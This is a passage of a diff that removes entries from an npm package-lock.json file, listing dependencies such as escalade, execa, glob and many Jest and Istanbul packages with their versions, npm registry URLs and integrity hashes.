"dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", - "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", - "dev": true - }, - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-2Zks0hf1VLFYI1kbh0I5jP3KHHyCHpkfyHBzsSXRFgl/Bg9mWYfMW8oD+PdMPlEwy5HNsR9JutYy6pMeOh61nw==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=" - }, - "fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "filelist": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.4.tgz", - "integrity": "sha512-w1cEuf3S+DrLCQL7ET6kz+gmlJdbq9J7yXCSjK/OZCPA+qEN1WyF4ZAf0YYJa4/shHJra2t/d/r8SV4Ji+x+8Q==", - "dev": true, - "requires": { - "minimatch": "^5.0.1" - }, - "dependencies": { - "brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0" - } - }, - "minimatch": { - "version": "5.1.6", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", - "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", - "dev": true, - "requires": { - "brace-expansion": "^2.0.1" - } - } - } - }, - "fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "foreground-child": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.0.tgz", - "integrity": "sha512-Ld2g8rrAyMYFXBhEqMz8ZAHBi4J4uS1i/CxGMDnjyFWddMXLVcDp051DZfu+t7+ab7Wv6SMqpWmyFIj5UbfFvg==", - "requires": { - "cross-spawn": "^7.0.0", - "signal-exit": "^4.0.1" - }, - "dependencies": { - "signal-exit": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", - "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==" - } - } - }, - "forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=" - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "fsevents": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", - "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", - "dev": true, - "optional": true - }, - "function-bind": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", - "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", - "dev": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true - }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true - }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true - }, - "getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - } - }, - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - }, - "graceful-fs": { - "version": "4.2.10", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.10.tgz", - "integrity": "sha512-9ByhssR2fPVsNZj478qUUbKfmL0+t5BDVyjShtyZZLiK7ZDAArFFfopyOTj0M05wE2tJPisA4iTnnXl2YoPvOA==", - "dev": true - }, - "har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=" - }, - "har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "requires": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - } - }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true - }, - "hasown": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", - "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", - "dev": true, - "requires": { - "function-bind": "^1.1.2" - } - }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", - "requires": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - } - }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "import-local": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.2.0.tgz", - "integrity": "sha512-2SPlun1JUPWoM6t3F0dw0FkCF/jWY8kttcY4f599GLTSjh2OCuuhdTkJQsEcZzBqbXZGKMK2OqW1oZsjtf/gQA==", - "dev": true, - "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - } - }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true - }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "is-core-module": { - "version": "2.15.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.15.1.tgz", - "integrity": "sha512-z0vtXSwucUJtANQWldhbtbt7BnL0vxiFjIdDLAatwhDYty2bad6s+rijD6Ri4YuYJubLzIJLUidCh09e1djEVQ==", - "dev": true, - "requires": { - "hasown": "^2.0.2" - } - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==" - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=" - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha1-6PvzdNxVb/iUehDcsFctYz8s+hA=" - }, - "isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "requires": {} - }, - "isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=" - }, - "istanbul-lib-coverage": { - "version": "3.2.2", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.2.tgz", - "integrity": "sha512-O8dpsF+r0WV/8MNRKfnmrtCWhuKjxrq2w+jpzBL5UZKTi2LeVWnWOmWRxFlesJONmc+wLAGvKQZEOanko0LFTg==", - "dev": true - }, - "istanbul-lib-instrument": { - "version": "6.0.3", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-6.0.3.tgz", - "integrity": "sha512-Vtgk7L/R2JHyyGW07spoFlB8/lpjiOLTjMdms6AFMraYt3BaJauod/NGrfnVG/y4Ix1JEuMRPDPEj2ua+zz1/Q==", - "dev": true, - "requires": { - "@babel/core": "^7.23.9", - "@babel/parser": "^7.23.9", - "@istanbuljs/schema": "^0.1.3", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^7.5.4" - }, - "dependencies": { - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "istanbul-lib-report": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.1.tgz", - "integrity": "sha512-GCfE1mtsHGOELCU8e/Z7YWzpmybrx/+dSTfLrvY8qRmaY6zXTKWn6WQIjaAFw069icm6GVMNkgu0NzI4iPZUNw==", - "dev": true, - "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^4.0.0", - "supports-color": "^7.1.0" - } - }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - } - }, - "istanbul-reports": { - "version": "3.1.7", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.7.tgz", - "integrity": "sha512-BewmUXImeuRk2YY0PVbxgKAysvhRPUQE0h5QRM++nVWyubKGV0l8qQ5op8+B2DOmwSe63Jivj0BjkPQVf8fP5g==", - "dev": true, - "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - } - }, - "jackspeak": { - "version": "3.4.3", - "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz", - "integrity": "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==", - "requires": { - "@isaacs/cliui": "^8.0.2", - "@pkgjs/parseargs": "^0.11.0" - } - }, - "jake": { - "version": "10.9.2", - "resolved": "https://registry.npmjs.org/jake/-/jake-10.9.2.tgz", - "integrity": "sha512-2P4SQ0HrLQ+fw6llpLnOaGAvN2Zu6778SJMrCUwns4fOoG9ayrTiZk3VV8sCPkVZF8ab0zksVpS8FDY5pRCNBA==", - "dev": true, - "requires": { - "async": "^3.2.3", - "chalk": "^4.0.2", - "filelist": "^1.0.4", - "minimatch": "^3.1.2" - } - }, - "jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.7.0.tgz", - "integrity": "sha512-NIy3oAFp9shda19hy4HK0HRTWKtPJmGdnvywu01nOqNC2vZg+Z+fvJDxpMQA88eb2I9EcafcdjYgsDthnYTvGw==", - "dev": true, - "requires": { - "@jest/core": "^29.7.0", - "@jest/types": "^29.6.3", - "import-local": "^3.0.2", - "jest-cli": "^29.7.0" - } - }, - "jest-changed-files": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.7.0.tgz", - "integrity": "sha512-fEArFiwf1BpQ+4bXSprcDc3/x4HSzL4al2tozwVpDFpsxALjLYdyiIK4e5Vz66GQJIbXJ82+35PtysofptNX2w==", - "dev": true, - "requires": { - "execa": "^5.0.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0" - } - }, - "jest-circus": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.7.0.tgz", - "integrity": "sha512-3E1nCMgipcTkCocFwM90XXQab9bS+GMsjdpmPrlelaxwD93Ad8iVEjX/vvHPdLPnFf+L40u+5+iutRdA1N9myw==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^1.0.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.7.0", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0", - "pretty-format": "^29.7.0", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-cli": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.7.0.tgz", - "integrity": "sha512-OVVobw2IubN/GSYsxETi+gOe7Ka59EFMR/twOU3Jb2GnKKeMGJB5SGUUrEz3SFVmJASUdZUzy83sLNNQ2gZslg==", - "dev": true, - "requires": { - "@jest/core": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "create-jest": "^29.7.0", - "exit": "^0.1.2", - "import-local": "^3.0.2", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.7.0.tgz", - "integrity": "sha512-uXbpfeQ7R6TZBqI3/TxCU4q4ttk3u0PJeC+E0zbfSoSjq6bJ7buBPxzQPL0ifrkY4DNu4JUdk0ImlBUYi840eQ==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-jest": "^29.7.0", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - } - }, - "jest-diff": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.7.0.tgz", - "integrity": "sha512-LMIgiIrhigmPrs03JHpxUh2yISK3vLFPkAodPeo0+BuF7wA2FoQbkEg1u8gBYBThncu7e1oEDUfIXVuTqLRUjw==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.6.3", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-docblock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.7.0.tgz", - "integrity": "sha512-q617Auw3A612guyaFgsbFeYpNP5t2aoUNLwBUbc/0kD1R4t9ixDbyFTHd1nok4epoVFpr7PmeWHrhvuV3XaJ4g==", - "dev": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-each": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.7.0.tgz", - "integrity": "sha512-gns+Er14+ZrEoC5fhOfYCY1LOHHr0TI+rQUHZS8Ttw2l7gl+80eHc/gFf2Ktkw0+SIACDTeWvpFcv3B04VembQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "jest-util": "^29.7.0", - "pretty-format": "^29.7.0" - } - }, - "jest-environment-node": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.7.0.tgz", - "integrity": "sha512-DOSwCRqXirTOyheM+4d5YZOrWcdu0LNZ87ewUoywbcb2XR4wKgqiG8vNeYwhjFMbEkfju7wx2GYH0P2gevGvFw==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "jest-get-type": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.6.3.tgz", - "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==", - "dev": true - }, - "jest-haste-map": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.7.0.tgz", - "integrity": "sha512-fP8u2pyfqx0K1rGn1R9pyE0/KTn+G7PxktWidOBTqFPLYX0b9ksaMFkhK5vrS3DVun09pckLdlx90QthlW7AmA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.7.0.tgz", - "integrity": "sha512-kYA8IJcSYtST2BY9I+SMC32nDpBT3J2NvWJx8+JCuCdl/CR1I4EKUJROiP8XtCcxqgTTBGJNdbB1A8XRKbTetw==", - "dev": true, - "requires": { - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-matcher-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.7.0.tgz", - "integrity": "sha512-sBkD+Xi9DtcChsI3L3u0+N0opgPYnCRPtGcQYrgXmR+hmt/fYfWAL0xRXYU8eWOdfuLgBe0YCW3AFtnRLagq/g==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-message-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.7.0.tgz", - "integrity": "sha512-GBEV4GRADeP+qtB2+6u61stea8mGcOT4mCtrYISZwfu9/ISHFJ/5zOMXYbpBE9RsS5+Gb63DW4FgmnKJ79Kf6w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-mock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.7.0.tgz", - "integrity": "sha512-ITOMZn+UkYS4ZFh83xYAOzWStloNzJFO2s8DWrE4lhtGD+AorgnbkiKERe4wQVBydIGPx059g6riW5Btp6Llnw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-util": "^29.7.0" - } - }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": 